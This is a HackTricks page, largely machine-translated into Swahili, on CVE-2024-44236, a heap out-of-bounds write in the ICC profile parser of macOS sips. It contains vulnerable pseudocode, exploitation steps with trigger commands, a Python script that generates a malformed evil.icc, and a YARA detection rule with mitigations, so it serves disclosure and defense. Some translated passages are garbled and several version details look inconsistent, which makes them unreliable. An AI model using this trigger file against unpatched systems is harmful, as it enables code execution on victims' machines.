WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)

Reading time: 5 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

Ushirikiano wa zero-write wa nje ya mipaka katika Apple macOS Scriptable Image Processing System (sips) parser ya profaili ya ICC (macOS 15.0.1, sips-307) unaruhusu mshambuliaji kuharibu metadata ya heap na kubadilisha primitive kuwa utekelezaji kamili wa msimbo. Kosa hili liko katika usimamizi wa uwanja wa offsetToCLUT wa lebo za lutAToBType (mAB ) na lutBToAType (mBA ). Ikiwa washambuliaji wataweka offsetToCLUT == tagDataSize, parser inafuta bytes 16 baada ya mwisho wa buffer ya heap. Heap spraying inaruhusu mshambuliaji kufuta muundo wa allocator au viashiria vya C++ ambavyo baadaye vitarejelewa, na kutoa mnyororo wa arbitrary-write-to-exec (CVE-2024-44236, CVSS 7.8).

Apple ilirekebisha kosa hili katika macOS Sonoma 15.2 / Ventura 14.7.1 (Oktoba 30, 2024). Toleo la pili (CVE-2025-24185) lilirekebishwa katika macOS 15.5 na iOS/iPadOS 18.5 mnamo Aprili 1, 2025.

Vulnerable Code

c
// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
if (offsetToCLUT <= tagDataSize) {
// BAD ➜ zero 16 bytes starting *at* offsetToCLUT
for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
buffer[i] = 0;            // no bounds check vs allocated size!
}

Hatua za Utekelezaji

  1. Tengeneza profaili mbaya ya .icc
  • Weka kichwa kidogo cha ICC (acsp) na ongeza lebo moja ya mAB (au mBA ).
  • Sanidi jedwali la lebo ili offsetToCLUT iwe sawa na saizi ya lebo (tagDataSize).
  • Weka data inayodhibitiwa na mshambuliaji mara baada ya lebo ili kwamba maandiko 16 ya sifuri yachanganye metadata ya allocator.
  1. Chochea uchambuzi kwa operesheni yoyote ya sips inayogusa profaili
bash
# njia ya uthibitisho (hakuna faili la pato linahitajika)
sips --verifyColor evil.icc
# au kwa njia isiyo ya moja kwa moja wakati wa kubadilisha picha zinazojumuisha profaili
sips -s format png payload.jpg --out out.png
  1. Uharibifu wa metadata ya Heap ➜ kuandika bila mpangilio ➜ ROP Katika nano_zone allocator ya Apple, metadata ya nafasi za byte 16 inapatikana moja kwa moja baada ya slab iliyopangwa ya 0x1000. Kwa kuweka lebo ya profaili mwishoni mwa slab kama hiyo, maandiko 16 ya sifuri yanaharibu meta->slot_B. Baada ya free inayofuata, kiashiria kilichoharibiwa kinajumuishwa kwenye orodha ndogo ya bure, ikiruhusu mshambuliaji kuweka kitu bandia kwenye anwani isiyo ya kawaida na kuandika kiashiria cha vtable cha C++ kinachotumiwa na sips, hatimaye kuhamasisha utekelezaji kwa mnyororo wa ROP uliohifadhiwa kwenye buffer mbaya ya ICC.

Mzushi wa PoC wa Haraka (Python 3)

python
#!/usr/bin/env python3
import struct, sys

HDR = b'acsp'.ljust(128, b'\0')          # ICC header (magic + padding)
TAGS = [(b'mAB ', 132, 52)]              # one tag directly after header
profile  = HDR
profile += struct.pack('>I', len(TAGS))  # tag count
profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)

mab = bytearray(52)                      # tag payload (52 bytes)
struct.pack_into('>I', mab, 44, 52)      # offsetToCLUT = size (OOB start)
profile += mab

open('evil.icc', 'wb').write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))

YARA detection rule

yara
rule ICC_mAB_offsetToCLUT_anomaly
{
meta:
description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
author       = "HackTricks"
strings:
$magic = { 61 63 73 70 }          // 'acsp'
$mab   = { 6D 41 42 20 }          // 'mAB '
$mba   = { 6D 42 41 20 }          // 'mBA '
condition:
$magic at 0 and
for any i in (0 .. 10):           // up to 10 tags
(
($mab at 132 + 12*i or $mba at 132 + 12*i) and
uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size
)
}

Impact

Kufungua au kushughulikia profaili ya ICC iliyoundwa husababisha arbitrary code execution ya mbali katika muktadha wa mtumiaji anayeitisha (Preview, QuickLook, Safari image rendering, Mail attachments, nk.), ikipita Gatekeeper kwa sababu profaili inaweza kuingizwa ndani ya picha zisizo na madhara (PNG/JPEG/TIFF).

Detection & Mitigation

  • Patch! Hakikisha mwenyeji anatumia macOS ≥ 15.2 / 14.7.1 (au iOS/iPadOS ≥ 18.1).
  • Tumia sheria ya YARA hapo juu kwenye lango za barua pepe na suluhisho za EDR.
  • Ondoa au safisha profaili za ICC zilizojumuishwa kwa exiftool -icc_profile= -overwrite_original <file> kabla ya kushughulikia zaidi kwenye faili zisizoaminika.
  • Imarisha Preview/QuickLook kwa kuzifanya zifanye kazi ndani ya VMs za “transparency & modernisation” zilizofungwa wakati wa kuchambua maudhui yasiyojulikana.
  • Kwa DFIR, angalia utekelezaji wa hivi karibuni wa sips --verifyColor au upakiaji wa maktaba ya ColorSync na programu zilizofungwa katika kumbukumbu iliyounganishwa.

References

  • Trend Micro Zero Day Initiative advisory ZDI-24-1445 – “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)” https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
  • Apple security updates HT213981 “About the security content of macOS Sonoma 15.2” https://support.apple.com/en-us/HT213981

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks